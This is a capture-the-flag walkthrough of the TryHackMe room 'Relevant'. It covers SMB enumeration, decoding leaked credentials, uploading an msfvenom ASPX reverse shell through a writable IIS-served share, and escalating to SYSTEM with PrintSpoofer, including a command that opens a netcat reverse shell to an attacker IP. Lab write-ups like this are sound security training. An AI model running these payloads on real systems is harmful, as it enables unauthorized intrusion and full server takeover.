How I Hacked a Win Server Using Printspoofer
CHALLENGE OVERVIEW
- Link: https://tryhackme.com/room/relevant
- Difficulty: Medium
- Target: User/root flags
- Highlight: Using PrintSpoofer to escalate from the web-server account to NT AUTHORITY\SYSTEM
- Tools used: nmap, dirb, smbmap, base64, msfvenom, netcat
- Tags: Security, Security Misconfiguration, Pentest, blackbox
BACKGROUND

This is another blackbox-style CTF challenge.
We go into the pentest without any prior knowledge of our target. We are only provided the IP address and will need to do our own enumeration to learn more about our target, and then we’ll move on to planning and executing our attack.
ENUMERATION/RECON

Here are some of the most notable results from our initial enumeration scans.
Nmap results:

It is curious that there are two open ports running HTTP servers. We would be wise to follow up on this finding with dirb scans on both ports to check for hidden directories.
The name Relevant also pops up on port 3389 (RDP). This may be important, considering the name of this challenge.
Smbmap
Using smbmap we are able to enumerate four shares along with the permissions we have on each.

We’ll proceed by connecting to the nt4wrksv share, because it is both readable and writable, and smbmap could see it without credentials, so it most likely allows anonymous access.

We found a passwords.txt file here that holds two base64-encoded strings. Base64 is an encoding, not encryption, so no key is needed; we can decode each string with:
echo "<encoded string>" | base64 -d
Decoding gives us two sets of credentials. These may come in handy later on in our hack.
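As an added example (not part of the original walkthrough), here is a small Python decoder that does what the one-liner above does for every line of a passwords.txt copied off the share: it skips section headers, repairs missing "=" padding, and only reports lines that decode to printable text. The sample file contents are constructed for this example (the classic "admin:password" and "user:pass" strings), not the room's real data.

```python
import base64
import binascii
import string

B64_ALPHABET = set(string.ascii_letters + string.digits + "+/=")

# Constructed stand-in for the share's passwords.txt (these two entries are
# the classic "admin:password" and "user:pass" examples, not the room's data).
# The first entry has had its "=" padding dropped on purpose to show repair.
SAMPLE_PASSWORDS_TXT = """[User Passwords - Encoded]
YWRtaW46cGFzc3dvcmQ
dXNlcjpwYXNz
not-base64!
"""


def try_base64(token):
    """Decode one token if it is base64 text; otherwise return None.

    Padding is re-added when missing, and the result is only accepted if it
    is printable UTF-8, a heuristic that filters most accidental matches
    (short plain words can be valid base64 but decode to binary junk).
    """
    if not token or any(c not in B64_ALPHABET for c in token):
        return None
    padded = token + "=" * (-len(token) % 4)
    try:
        data = base64.b64decode(padded, validate=True)
        text = data.decode("utf-8")
    except (binascii.Error, ValueError, UnicodeDecodeError):
        return None
    if not text or any(c not in string.printable for c in text):
        return None
    return text


def decode_candidates(file_text):
    """Return (encoded, decoded) pairs for every line that decodes cleanly.

    Blank lines and bracketed section headers such as "[User Passwords]" are
    skipped so they do not produce false hits.
    """
    found = []
    for raw in file_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("["):
            continue
        decoded = try_base64(line)
        if decoded is not None:
            found.append((line, decoded))
    return found


if __name__ == "__main__":
    for encoded, decoded in decode_candidates(SAMPLE_PASSWORDS_TXT):
        print(f"{encoded} -> {decoded}")
```

The printable-text check is deliberately loose: it keeps real credentials that contain punctuation while dropping lines that merely look like base64, which is what you want when bulk-decoding a file of unknown layout.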
Another interesting finding is that the web server on the target serves the contents of the nt4wrksv share (it is reachable over HTTP as /nt4wrksv/), and that is the same share we can write to over SMB at //10.10.5.113/nt4wrksv. This means anything we upload to the share can be requested from the browser and executed by IIS, which gives us a way to plant a reverse shell.
We’ll use the rev.aspx file that I previously created with msfvenom. We are choosing aspx for the format because we know that our server is running Microsoft IIS httpd, and .aspx pages are executed server-side by IIS.
You can build your own rev.aspx for spawning a reverse Windows shell with the following command (if the application pool turns out to be 64-bit, use the windows/x64/shell_reverse_tcp payload instead, since the shellcode has to match the architecture of the worker process it runs in):
msfvenom -p windows/shell_reverse_tcp LHOST=<your IP> LPORT=<your port> -f aspx > rev.aspx
UPLOAD THE REV.ASPX PAYLOAD

After uploading the rev.aspx payload to //<targetIP>/nt4wrksv with smbclient (the put <filename> command), we’ll set up a netcat listener on the port we baked into the payload as LPORT:
nc -lnvp 3333
We can now trigger the reverse shell by loading in our browser:
http://<targetIP>/nt4wrksv/rev.aspx
And now we have our initial foothold!
Next, let’s run an nmap --script vuln scan to drill in on more details about potential vulnerabilities on the target machine.

Our nmap script vuln scan turns up ms17-010, indicating that the target’s SMBv1 service is vulnerable to the famous EternalBlue exploit.
INITIAL FOOTHOLD

Running whoami /priv reveals that SeImpersonatePrivilege is enabled. This is exactly the privilege the PrintSpoofer technique abuses, so let’s keep it in mind as a possible plan B for privilege escalation.
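To make the check above systematic, here is an added Python triage script (my example, not part of the original post or the PrintSpoofer project) that parses saved whoami /priv output and flags the privileges that commonly lead to SYSTEM, with the two that PrintSpoofer needs listed first. The sample output is constructed to resemble what an IIS application pool identity typically reports; the layout matches the real command, the values are illustrative.

```python
# Privileges worth a second look, with the escalation path each typically
# enables. The first two are the ones PrintSpoofer needs (either one suffices).
DANGEROUS_PRIVILEGES = {
    "SeImpersonatePrivilege": "impersonate a SYSTEM client over a named pipe (PrintSpoofer, Potato family)",
    "SeAssignPrimaryTokenPrivilege": "start a process with a stolen SYSTEM token (PrintSpoofer, Potato family)",
    "SeDebugPrivilege": "open and inject into SYSTEM processes",
    "SeBackupPrivilege": "read any file, including the SAM and SYSTEM hives",
    "SeRestorePrivilege": "write any file, e.g. replace a service binary",
    "SeTakeOwnershipPrivilege": "take ownership of protected files and registry keys",
    "SeLoadDriverPrivilege": "load a kernel driver",
}

# Constructed sample of `whoami /priv` for an IIS application pool identity
# (format copied from the real command; the values are illustrative).
SAMPLE_WHOAMI_PRIV = """
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""


def parse_whoami_priv(output):
    """Return {privilege_name: state} parsed from `whoami /priv` text.

    Data rows start with a Se* privilege name and end with Enabled/Disabled;
    the banner, column headers and separator rows are skipped.
    """
    privileges = {}
    for line in output.splitlines():
        parts = line.split()
        if len(parts) >= 3 and parts[0].startswith("Se") and parts[-1] in ("Enabled", "Disabled"):
            privileges[parts[0]] = parts[-1]
    return privileges


def triage_privileges(output):
    """List (name, state, why) for every held privilege in DANGEROUS_PRIVILEGES.

    A 'Disabled' entry still matters: the token holds the privilege, and a
    process can enable it with AdjustTokenPrivileges before using it, so it
    is reported alongside the enabled ones rather than dropped.
    """
    held = parse_whoami_priv(output)
    return [(name, held[name], why) for name, why in DANGEROUS_PRIVILEGES.items() if name in held]


if __name__ == "__main__":
    for name, state, why in triage_privileges(SAMPLE_WHOAMI_PRIV):
        print(f"[!] {name} ({state}): {why}")
```

Paste the real whoami /priv output from the shell into SAMPLE_WHOAMI_PRIV (or read it from a file) and the script tells you at a glance whether a token-impersonation tool such as PrintSpoofer is even an option before you bother uploading it.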

LOCAL RECON
c:\Users\Bob\Desktop>type user.txt
THM{fd--------omitted--------45}
PRIVILEGE ESCALATION

Our nmap --script vuln scan revealed a vulnerability to EternalBlue (ms17-010).
I tried setting up the Python script from Exploit-DB and wasn’t successful. If this was a real pentest, I would definitely do further investigation into the exploit and try using the Metasploit EternalBlue module. For now, let’s go to plan B – the PrintSpoofer exploit.
PLAN B – USING PRINTSPOOFER TO GAIN ADMINISTRATIVE AUTHORITY
👉 Link: https://github.com/itm4n/PrintSpoofer
PrintSpoofer abuses SeImpersonatePrivilege: it coerces the Print Spooler service, which runs as SYSTEM, into connecting to a named pipe it controls, impersonates that connection, and its -c option runs a command with the resulting SYSTEM token. Both PrintSpoofer.exe and nc.exe need to be on the target first (the writable share is one way to get them there), and a fresh netcat listener should be waiting on the attacker side, since the one from the initial foothold is occupied by our current shell. From the low-privilege shell:
.\PrintSpoofer.exe -c ".\nc.exe 10.6.2.23 3333 -e cmd"
And now we are NT AUTHORITY\SYSTEM, which gives us full administrative control of the box!
POST-EXPLOITATION
Let’s grab the root flag from the usual directory.

FINAL THOUGHTS

There are probably several ways to solve this box, but this is the one that seemed most natural to me.
Some information we learned during enumeration ended up being irrelevant to our attack vector. I guess the lesson here is to look for viable ways forward and not to dwell for too long on extra information, such as the base64-encoded passwords or the EternalBlue vulnerability that didn’t seem to work for privilege escalation.
Again, the simpler solution proved to be the better solution.

I am a freelance ethical hacker/penetration tester. I have extensive experience in penetration testing and vulnerability assessments on web apps and servers. I am also fluent in Mandarin and have 15 years of experience as an edTech integration specialist, curriculum designer, and foreign language teacher.